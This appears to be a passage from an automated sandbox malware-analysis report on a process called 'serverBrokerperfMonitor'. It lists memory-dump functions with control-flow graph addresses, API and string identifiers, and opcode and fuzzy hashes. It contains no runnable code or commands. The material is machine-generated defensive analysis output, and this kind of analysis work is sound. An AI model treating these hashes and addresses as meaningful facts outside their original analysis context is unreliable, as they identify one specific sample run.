                                                                                                  Function 00007FFD9BBA07D9 Relevance: 1.4, APIs: 1, Instructions: 145COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 36 7ffd9bba07d9-7ffd9bba07e5 37 7ffd9bba07e7-7ffd9bba07ef 36->37 38 7ffd9bba07f0-7ffd9bba08c2 CloseHandle 36->38 37->38 42 7ffd9bba08ca-7ffd9bba091e 38->42 43 7ffd9bba08c4 38->43 43->42
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2962429428-0
                                                                                                  • Opcode ID: 87436add337fecb39f3e0ea8ef896b41bd8c97f80bbb157a94eb0188c52a61ef
                                                                                                  • Instruction ID: 6de1a4cf150e89ed5438663bbc8a9106a0f4d9ecb3909e39686bd911d5405652
                                                                                                  • Opcode Fuzzy Hash: 87436add337fecb39f3e0ea8ef896b41bd8c97f80bbb157a94eb0188c52a61ef
                                                                                                  • Instruction Fuzzy Hash: 6E414A70E0864C8FDB59DFA8C894BEDBBF0FB56310F1441AAD049E7292DA74A885CB41
                                                                                                  Function 00007FFD9B9E090D Relevance: .2, Instructions: 171COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 88 7ffd9b9e090d-7ffd9b9e0949 92 7ffd9b9e094b-7ffd9b9e0985 88->92 93 7ffd9b9e0986-7ffd9b9e098f 88->93 92->93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f1eac5d810eede91ed5ff7e4e3e17f82bd1bbd59b775eb3dec48cc96494ff8a
                                                                                                  • Instruction ID: b89c21ceeb2fed208a7d397299c15897c463999783cfab1bf160a25ff2b7ea6a
                                                                                                  • Opcode Fuzzy Hash: 5f1eac5d810eede91ed5ff7e4e3e17f82bd1bbd59b775eb3dec48cc96494ff8a
                                                                                                  • Instruction Fuzzy Hash: 6D51BF31B1855D8FEB54FFA8D495AEC7BE0FF58314F0105BAD00ED7196DA35A8818B80
                                                                                                  Function 00007FFD9B9E08E8 Relevance: .2, Instructions: 152COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 101 7ffd9b9e08e8-7ffd9b9e08fa 104 7ffd9b9e08fc 101->104 105 7ffd9b9e08fd-7ffd9b9e0902 101->105 104->105 106 7ffd9b9e0905-7ffd9b9f8b04 105->106 107 7ffd9b9e0904 105->107 109 7ffd9b9f8b0b-7ffd9b9f8b11 106->109 110 7ffd9b9f8b06 106->110 107->106 111 7ffd9b9f8be5-7ffd9b9f8beb 109->111 110->109 112 7ffd9b9f8b16-7ffd9b9f8b4c 111->112 113 7ffd9b9f8bf1-7ffd9b9f8bfa 111->113 115 7ffd9b9f8b52-7ffd9b9f8bbf 112->115 120 7ffd9b9f8bc1-7ffd9b9f8bca 115->120 121 7ffd9b9f8bdd-7ffd9b9f8be2 115->121 120->121 122 7ffd9b9f8bcc-7ffd9b9f8bdc 120->122 121->111
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5dd9ce702684b488146e6c69aca35246c0db87672a84b6b2dd4ac7d14d958322
                                                                                                  • Instruction ID: a8d9fcfb6fcc112d5c341975a90fc59f7da4456f4ea9dd04a46850b6df65d8d4
                                                                                                  • Opcode Fuzzy Hash: 5dd9ce702684b488146e6c69aca35246c0db87672a84b6b2dd4ac7d14d958322
                                                                                                  • Instruction Fuzzy Hash: 8B51E371A0850E9FCF84EF68D894EED7BF1FF58355B050265E409E72A1CA34E990CB80
                                                                                                  Function 00007FFD9B9E0998 Relevance: .1, Instructions: 113COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 451a724e94549007b69eced40b994585848bd83dfab1fc482514ec114b272307
                                                                                                  • Instruction ID: 64ae2827f82059cdfecfd14c3e7af1390045ec7dd37cb085a80e986ec0b8a3e2
                                                                                                  • Opcode Fuzzy Hash: 451a724e94549007b69eced40b994585848bd83dfab1fc482514ec114b272307
                                                                                                  • Instruction Fuzzy Hash: 18412830E1491D9FDF94EFA8C495AEDBBF1FF68715F10017AE409E32A5DA34A9418B80
                                                                                                  Function 00007FFD9BC3160D Relevance: .1, Instructions: 101COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 160 7ffd9bc3160d-7ffd9bc3160e 161 7ffd9bc31610-7ffd9bc3162b 160->161 162 7ffd9bc3168d-7ffd9bc31694 160->162 163 7ffd9bc3162d 161->163 164 7ffd9bc31632-7ffd9bc3164d 161->164 165 7ffd9bc3169e-7ffd9bc3178b 162->165 163->164 164->162
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1966015794.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bc30000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3eea52484bcd4c12570162b3ed22d64f160adb2d687003ab62c168ab7f9d8259
                                                                                                  • Instruction ID: 358499788216530113703ea77e24cc2833fd83f8ab92efa318d05a01b2ec8610
                                                                                                  • Opcode Fuzzy Hash: 3eea52484bcd4c12570162b3ed22d64f160adb2d687003ab62c168ab7f9d8259
                                                                                                  • Instruction Fuzzy Hash: F841B271A18A4A8FDB54EB58C8A1EA8B7F2FF58309F4501F9D40DD3292DB34A981CB41
                                                                                                  Function 00007FFD9B9E7DF1 Relevance: .1, Instructions: 99COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 890d185046cbf8eaeb84a3f6bcce5b4d3dfaae1ff280616191eb269524f5d99e
                                                                                                  • Instruction ID: 106aae3647675ae781a22f03fc96811ed7024424e356991e1876a1138aece326
                                                                                                  • Opcode Fuzzy Hash: 890d185046cbf8eaeb84a3f6bcce5b4d3dfaae1ff280616191eb269524f5d99e
                                                                                                  • Instruction Fuzzy Hash: D8419470A1952D8FEBB5EB54C858BA8B7F5FB58701F0141EAD04DE22A1DA746BC4CF00
                                                                                                  Function 00007FFD9BC31659 Relevance: .1, Instructions: 99COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 211 7ffd9bc31659-7ffd9bc31693 216 7ffd9bc3169e-7ffd9bc3178b 211->216
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1966015794.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bc30000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae406be6af1adf3db48511c04374e440d63c529e1751e7a8beedee97de2bed4d
                                                                                                  • Instruction ID: 18f6480a342be1282b727a69017d9b1e72e5f1af7758acf2d0d4810990a634e1
                                                                                                  • Opcode Fuzzy Hash: ae406be6af1adf3db48511c04374e440d63c529e1751e7a8beedee97de2bed4d
                                                                                                  • Instruction Fuzzy Hash: F4318571A18A4A8FDB58EF588CB5DA4B7E2FB68305F4901FAD40DD3192DA35A9818F01
                                                                                                  Function 00007FFD9B9E0C25 Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 226 7ffd9b9e0c25-7ffd9b9e0c41 228 7ffd9b9e0c7b-7ffd9b9e0c8f 226->228 229 7ffd9b9e0c43-7ffd9b9e0c77 226->229 231 7ffd9b9e0c96 call 7ffd9b9e0960 228->231 232 7ffd9b9e0c91 228->232 229->228 235 7ffd9b9e0c9b-7ffd9b9e0ca8 231->235 232->231 237 7ffd9b9e0cab-7ffd9b9e0caf 235->237 238 7ffd9b9e0ccc-7ffd9b9e0d04 call 7ffd9b9e07d0 237->238 239 7ffd9b9e0cb1-7ffd9b9e0cc8 237->239 238->237 246 7ffd9b9e0d06-7ffd9b9e0d0b 238->246 241 7ffd9b9e0cca 239->241 241->241 246->237
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 728293b3238415117c8281406b1eb36e56936e068ac899964f4e90b17f00537e
                                                                                                  • Instruction ID: 8ca68fc2b453e795bb7d2a9729fafe4903b5bcfb2d694868313dfd58d4f6e61d
                                                                                                  • Opcode Fuzzy Hash: 728293b3238415117c8281406b1eb36e56936e068ac899964f4e90b17f00537e
                                                                                                  • Instruction Fuzzy Hash: B3314531F0E24E9FE721ABA8C8622FD7BA0EF95710F050677D555A71E2CA782706C790
                                                                                                  Function 00007FFD9B9E93D0 Relevance: .1, Instructions: 89COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 247 7ffd9b9e93d0-7ffd9b9e9444 251 7ffd9b9e944f-7ffd9b9e94a1 247->251 252 7ffd9b9e94aa-7ffd9b9e94db call 7ffd9b9e0780 251->252 255 7ffd9b9e93a3-7ffd9b9e93aa 252->255 256 7ffd9b9e94e1-7ffd9b9e94eb 252->256 257 7ffd9b9e93ac-7ffd9b9e93c6 255->257 258 7ffd9b9e93ca-7ffd9b9e9500 255->258 256->255 257->247 261 7ffd9b9e9507-7ffd9b9e954b call 7ffd9b9e0780 258->261 262 7ffd9b9e9502 258->262 261->255 265 7ffd9b9e9551-7ffd9b9e9559 261->265 262->261 265->255
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 64a697281f667d8dd519a6cdb8d010b0e7a4d44445638d9e4b8c574d61d69115
                                                                                                  • Instruction ID: 10329a5a5d6d3047f3d080bb8c1a549b05cb1534bbca0e10fa3a456528707a4a
                                                                                                  • Opcode Fuzzy Hash: 64a697281f667d8dd519a6cdb8d010b0e7a4d44445638d9e4b8c574d61d69115
                                                                                                  • Instruction Fuzzy Hash: 3F31837191491D9FDFA8EF18C855AE9B3F1FB68305F5081EAC04DE36A4CE716A848F81
                                                                                                  Function 00007FFD9B9E116D Relevance: .1, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 73594df84dbf96538ef268b129267366d250e0b0b95306ce7f7f9a72feaa9a93
                                                                                                  • Instruction ID: b0988d74191e0b67bbb3c3354b194f86487f0147e80a092dec66677d0bf98add
                                                                                                  • Opcode Fuzzy Hash: 73594df84dbf96538ef268b129267366d250e0b0b95306ce7f7f9a72feaa9a93
                                                                                                  • Instruction Fuzzy Hash: 25216030A1491E9FEB94EFA8C8949EDB3F1FF68304B11057AD409D32A1DF35AA41CB40
                                                                                                  Function 00007FFD9B9E8045 Relevance: .1, Instructions: 64COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cd70e8ccf2384f1cfa9a238e858d943dd511ae4ac48444b642e1e7d5d7b40566
                                                                                                  • Instruction ID: f7cc5f76b7e5a96b72f26192f93cdd05463481c696f824b81106a8b8a3a1d76b
                                                                                                  • Opcode Fuzzy Hash: cd70e8ccf2384f1cfa9a238e858d943dd511ae4ac48444b642e1e7d5d7b40566
                                                                                                  • Instruction Fuzzy Hash: 3E21A270A2952D8FDBBADB54C8657E8B7B5EB58701F0101FA904DA22A5CA786BC1CF00
                                                                                                  Function 00007FFD9B9E7DB9 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a8c25c8a463a9b3fc1c51276fdb7191c8a043fb5836e7d15ae044cf22af8c242
                                                                                                  • Instruction ID: 7872b65cb56a02f323556a7ac9d4b57c812b9129a6dd3feb47c4c515d76aeccc
                                                                                                  • Opcode Fuzzy Hash: a8c25c8a463a9b3fc1c51276fdb7191c8a043fb5836e7d15ae044cf22af8c242
                                                                                                  • Instruction Fuzzy Hash: 2B211D71E2A51D9FDB75DBA498657B873B4FF09300F1150FAD00DA22A1DA786B808F01
                                                                                                  Function 00007FFD9B9E0C38 Relevance: .1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: decf6940849478becf9360312a678dfe7de969841327484622e38cae355c7a07
                                                                                                  • Instruction ID: d0560865b9221b9dacbd2823f53326b3a207349a4870ca492ae28dde3981a62a
                                                                                                  • Opcode Fuzzy Hash: decf6940849478becf9360312a678dfe7de969841327484622e38cae355c7a07
                                                                                                  • Instruction Fuzzy Hash: 79112931B0D64E9EF712EBA8D8622E977A0EF91710F054637D595A71E2DA34230AC790
                                                                                                  Function 00007FFD9B9E0C40 Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 45792273204e4c3660aaf2e8698c71cef3b5aa6cc581c9ad1c2bbadf86af312b
                                                                                                  • Instruction ID: c34728d16ea6d92bb315c311e043d466418ce32834d7d2bdfc8978cf91b1eb2b
                                                                                                  • Opcode Fuzzy Hash: 45792273204e4c3660aaf2e8698c71cef3b5aa6cc581c9ad1c2bbadf86af312b
                                                                                                  • Instruction Fuzzy Hash: 26112B31F0D64E9FF712EBA4C8622E977A0EF51710F054676D595A71E2CA342309C790
                                                                                                  Function 00007FFD9B9E0B7F Relevance: .1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20137a9f6a5dbe5c8b3d511cb0990968b43e1b4516daa7811d4684b12e2a5075
                                                                                                  • Instruction ID: 67e5dc96ff774be14aaea5cbed542f88d2c14fda088d8836877163c59c2f6709
                                                                                                  • Opcode Fuzzy Hash: 20137a9f6a5dbe5c8b3d511cb0990968b43e1b4516daa7811d4684b12e2a5075
                                                                                                  • Instruction Fuzzy Hash: 66115B3162824DDFCB44EF68C991AEA7BA0FF49318F1502AAF84DD7252C730E564CB81
                                                                                                  Function 00007FFD9B9E0C48 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0953e1e2df1b917435dbf88a9b8015b9cdf1cbdca14ee7c95751f5df10928c78
                                                                                                  • Instruction ID: acde4c17da542b6c672b857a7ff305281930a1e6f7149609406f48275cd4c502
                                                                                                  • Opcode Fuzzy Hash: 0953e1e2df1b917435dbf88a9b8015b9cdf1cbdca14ee7c95751f5df10928c78
                                                                                                  • Instruction Fuzzy Hash: 9C01F531E0E64E8EE712ABA4C8512E977B0EF45710F054676D592AB2E2CA386709C780
                                                                                                  Function 00007FFD9B9E0C50 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c31c44dd114b7b7a6da403276a6c434d08764b58f25261de208b3368ed4a68dd
                                                                                                  • Instruction ID: 74067188a7b58c24993077538f8566184921b8ef9b8391d4b9ed19cf2f4bbae1
                                                                                                  • Opcode Fuzzy Hash: c31c44dd114b7b7a6da403276a6c434d08764b58f25261de208b3368ed4a68dd
                                                                                                  • Instruction Fuzzy Hash: 0901F730E1E68E8AE711ABA4C8652ED77B0EF55710F044676D592972E2CE386704C741
                                                                                                  Function 00007FFD9B9E660A Relevance: .0, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 700af58039ffd69cb3274242299b1a399606eb17591d8353d55b852171ebdca3
                                                                                                  • Instruction ID: 8294df2d42ded1b0db2c54093861cc3a847c182269fc40fc0d76d2b92eafe5ac
                                                                                                  • Opcode Fuzzy Hash: 700af58039ffd69cb3274242299b1a399606eb17591d8353d55b852171ebdca3
                                                                                                  • Instruction Fuzzy Hash: 6C110670E0512E8BEBB4EF14C8597E9B3B1EB54704F1041FAD40DA62A1DA786F84CF40
                                                                                                  Function 00007FFD9B9E1388 Relevance: .0, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab3dd3fdb8f17019708fab9df37150ed597f3e48f9648115efd171371e5c63cd
                                                                                                  • Instruction ID: 5acf310e8effef3bff6cef6e4373a745257b09d4339833da71650511f4543ebe
                                                                                                  • Opcode Fuzzy Hash: ab3dd3fdb8f17019708fab9df37150ed597f3e48f9648115efd171371e5c63cd
                                                                                                  • Instruction Fuzzy Hash: 0801AC7091895D9FDF84EF58C458AAE7BF0FF68305F01056AE419D3264D771A990CB80
                                                                                                  Function 00007FFD9B9E655F Relevance: .0, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b41feb14d27c7f2f645cf4390ff4c56558c47c609fd87e94f4aa42773ddc276
                                                                                                  • Instruction ID: e4e55bd74bd3dbfab646f7f5c9a0e2935747eee9fa4f6103c7324b0d83a43ce8
                                                                                                  • Opcode Fuzzy Hash: 2b41feb14d27c7f2f645cf4390ff4c56558c47c609fd87e94f4aa42773ddc276
                                                                                                  • Instruction Fuzzy Hash: 92010871E0592D8FEB68DF58CC697EAB3B1FB55306F5141EAC00DE22A0DA742B848F01
                                                                                                  Function 00007FFD9B9E06A5 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9dd98c4fd6440364e8fe31c86fe0cc6b59abbb2d4420cc510651b3c565916d3d
                                                                                                  • Instruction ID: 4ba4870d1d1c5e25b1958eeda52ad46ee966e39f38578687589ba1eb127929c5
                                                                                                  • Opcode Fuzzy Hash: 9dd98c4fd6440364e8fe31c86fe0cc6b59abbb2d4420cc510651b3c565916d3d
                                                                                                  • Instruction Fuzzy Hash: 67F03030A1550EAFEB90EFA8D4596ED7BA0FF54714F510537E40CC21A0DA34A790CB81
                                                                                                  Function 00007FFD9B9E803A Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6eb42740d1fe5afe576930e9d442dd914545049bf26d3fbdeffb1327ed772ada
                                                                                                  • Instruction ID: b945ac092dca7826a21e9e1db253c7ba3c3f438c853778a6931506db50671bf0
                                                                                                  • Opcode Fuzzy Hash: 6eb42740d1fe5afe576930e9d442dd914545049bf26d3fbdeffb1327ed772ada
                                                                                                  • Instruction Fuzzy Hash: 1E01C870E2952D9FDB79DB61D8587B873B4BB18701F0105FED00DA62A4DA786B84CF00
                                                                                                  Function 00007FFD9B9E06C8 Relevance: .0, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c465b31e7c3162621821703b249d21df9200f4c50053575a56e6dfc640096de6
                                                                                                  • Instruction ID: c89c98bcf83cfff9dda4aecbc2556c44205c4926ac33c076c3fe56637326a101
                                                                                                  • Opcode Fuzzy Hash: c465b31e7c3162621821703b249d21df9200f4c50053575a56e6dfc640096de6
                                                                                                  • Instruction Fuzzy Hash: 5FF01230A1554D9FDB94EFA4D4496EA7BE0FF14304F510476F81DD2160DA34A6A0CB81

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FFD9B9E07F8 Relevance: 2.8, Strings: 2, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: kx$kx
                                                                                                  • API String ID: 0-2436564140
                                                                                                  • Opcode ID: 1e2298045f73625bad42855f74c35395b9b282249e3bd80045506d6976385e33
                                                                                                  • Instruction ID: fc22aff808271826ff0967034693dbe8db44d496c1b1ed34014c8ef7ddd72a69
                                                                                                  • Opcode Fuzzy Hash: 1e2298045f73625bad42855f74c35395b9b282249e3bd80045506d6976385e33
                                                                                                  • Instruction Fuzzy Hash: B891B530B0854D9FEBA8EF58D895BE93BD0FF15314F10417AE84EC7292DA35A985CB81
                                                                                                  Function 00007FFD9B9E0860 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
